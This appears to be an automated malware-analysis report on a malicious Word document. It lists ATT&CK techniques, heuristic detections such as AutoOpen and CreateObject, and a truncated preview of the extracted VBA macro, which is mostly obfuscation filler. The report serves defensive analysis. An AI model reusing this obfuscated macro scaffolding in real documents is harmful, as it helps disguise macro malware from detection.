MALICIOUS
162
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro. The AutoOpen macro is triggered upon opening, and the CreateObject heuristic indicates it's likely attempting to execute code. This pattern is commonly used to download and execute further malicious payloads, hence the classification as a spearphishing attachment.
Heuristics 6
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 54624 bytes |
SHA-256: 9413bff51d5cb02494b214e02ebe23dd44ab1e6b5a1fbc6943f21d4fddd3dae3 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "FVXAnubdU4" Public Function utpFMXhkf7e(ByRef zjacV7FNM As String, ByVal JPJ5DOAWg As String) As String Dim CeHEcuzuq6() As Byte #If 7 * 8 > 5 Then Dim mYfx593UWwRhea As String #Else Dim mYfx593UWwRhea As Object #End If #If 9 * 8 > 8 Then Dim T8kIZt5sMqDdrH As String #Else Dim T8kIZt5sMqDdrH As Object #End If Dim RAQusKA() As Byte Dim bCz0f2Zggo As String For DWY4UGli = 0 To 7 bCz0f2Zggo = bCz0f2Zggo + "q" Next DWY4UGli Dim iAEufZM As String For qiH16c = 0 To 9 iAEufZM = iAEufZM + "D" Next qiH16c Dim CccO9FQd As Long For vtKFw7 = 5 To 18 CccO9FQd = CccO9FQd + vtKFw7 Next vtKFw7 Dim zs1s5jE3 As Long For TQbF1i3R = 5 To 13 zs1s5jE3 = zs1s5jE3 + TQbF1i3R Next TQbF1i3R Dim kegAN1Qe As String For ppyKpmAr = 0 To 5 kegAN1Qe = kegAN1Qe + "w" Next ppyKpmAr Dim MnN9ptL As String For nqMJhoY = 0 To 5 MnN9ptL = MnN9ptL + "L" Next nqMJhoY Dim r0q3YTR, cZxnY7 As Integer r0q3YTR = 5 + 7 For DMib58PSm = 0 To 8 cZxnY7 = cZxnY7 + DMib58PSm Next DMib58PSm If cZxnY7 < DMib58PSm Then Dim dkkNkSt As Long End If #If 8 * 9 > 6 Then Dim dtr41wE5c0j5k4 As String #Else Dim dtr41wE5c0j5k4 As Object #End If Dim joQwFNZoLN5 As Long Dim hZdYvA As Long For fY9GSq = 7 To 10 hZdYvA = hZdYvA + fY9GSq Next fY9GSq Dim bEjG5k2GQe, su6zy3pDi0 As Integer bEjG5k2GQe = 6 + 8 For qsB1MrR3j0 = 0 To 8 su6zy3pDi0 = su6zy3pDi0 + qsB1MrR3j0 Next qsB1MrR3j0 If su6zy3pDi0 < qsB1MrR3j0 Then Dim mmIGNPdYo As Long End If For DjKgXK7To = 0 To 7 kajJLfaA = kajJLfaA + DjKgXK7To Next DjKgXK7To Dim T5XIGoRS As Long For Gg22gen8Gy = 5 To 16 T5XIGoRS = T5XIGoRS + Gg22gen8Gy Next Gg22gen8Gy Dim iGbiyo8K, HYfPjKoT As Integer iGbiyo8K = 6 + 9 For gKUJbRx = 0 To 9 HYfPjKoT = HYfPjKoT + gKUJbRx Next gKUJbRx If HYfPjKoT < gKUJbRx Then Dim dRbgdvXM As Long End If Dim e3ks0ph As String For BRp88LK = 0 To 6 e3ks0ph = e3ks0ph + "d" Next BRp88LK #If 8 * 7 > 9 Then Dim pEcphpCsbFkXid As String #Else Dim pEcphpCsbFkXid As Object #End If Dim zRRqhnVAkK As Long Dim saeeSMn5, VJKsvEn As Integer saeeSMn5 = 5 + 7 For VHX5nZdP = 0 To 7 VJKsvEn = VJKsvEn + VHX5nZdP Next VHX5nZdP If VJKsvEn < VHX5nZdP Then Dim TpqFkJ4 As Long End If Dim Bmnw7dEIm As Long For jKYcxsH = 5 To 14 Bmnw7dEIm = Bmnw7dEIm + jKYcxsH Next jKYcxsH Dim qmQJG55NqQ As String For SdL8OTXJ = 0 To 7 qmQJG55NqQ = qmQJG55NqQ + "D" Next SdL8OTXJ Dim YMA9ATBV As Long For eeyOJNrtSN = 8 To 15 YMA9ATBV = YMA9ATBV + eeyOJNrtSN Next eeyOJNrtSN Dim KKvJzn As String For Bw2Cc3c = 0 To 7 KKvJzn = KKvJzn + "X" Next Bw2Cc3c Dim Gcreamu As String For cNvdsyL = 0 To 7 Gcreamu = Gcreamu + "t" Next cNvdsyL #If 8 * 8 > 9 Then Dim tXy57mPGz05ZqQ As String #Else Dim tXy57mPGz05ZqQ As Object #End If #If 7 * 7 > 8 Then Dim jIf5SvjmiZYqTE As String #Else Dim jIf5SvjmiZYqTE As Object #End If #If 8 * 7 > 7 Then Dim pIuK9QhapQa7gb As String #Else Dim pIuK9QhapQa7gb As Object #End If Dim mEC0DGmgu7A As Long Dim T41Dqr As String For IAQH19euU = 0 To 6 T41Dqr = T41Dqr + "r" Next IAQH19euU Dim VQeJLX5 As String For pAVIacwgeE = 0 To 9 VQeJLX5 = VQeJLX5 + "c" Next pAVIacwgeE Dim YK7w3pyxm As String For lkUAax = 0 To 6 YK7w3pyxm = YK7w3pyxm + "A" Next lkUAax For vDjo1K = 0 To 8 SMnt0RCFZ = SMnt0RCFZ + vDjo1K Next vDjo1K Dim mn9mUg, krmgaw0Ibi As Integer mn9mUg = 6 + 5 For ONSPkMM = 0 To 9 krmgaw0Ibi = krmgaw0Ibi + ONSPkMM Next ONSPkMM If krmgaw0Ibi < ONSPkMM Then Dim HI6gCCWkc As Long End If #If 6 * 8 > 7 Then Dim rI6VGKuM1MPh6e As String #Else Dim rI6VGKuM1MPh6e As Object #End If #If 9 * 8 > 6 Then Dim VyIaAUibwabiJl As String #Else Dim VyIaAUibwabiJl As Object #End If Dim JNNFx9Fm As Long Dim EnScmU9V7 As String For s7vmxLbdLN = 0 To 5 EnScmU9V7 = EnScmU9V7 + "t" Next s7vmxLbdLN Dim OQft3e6hie ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.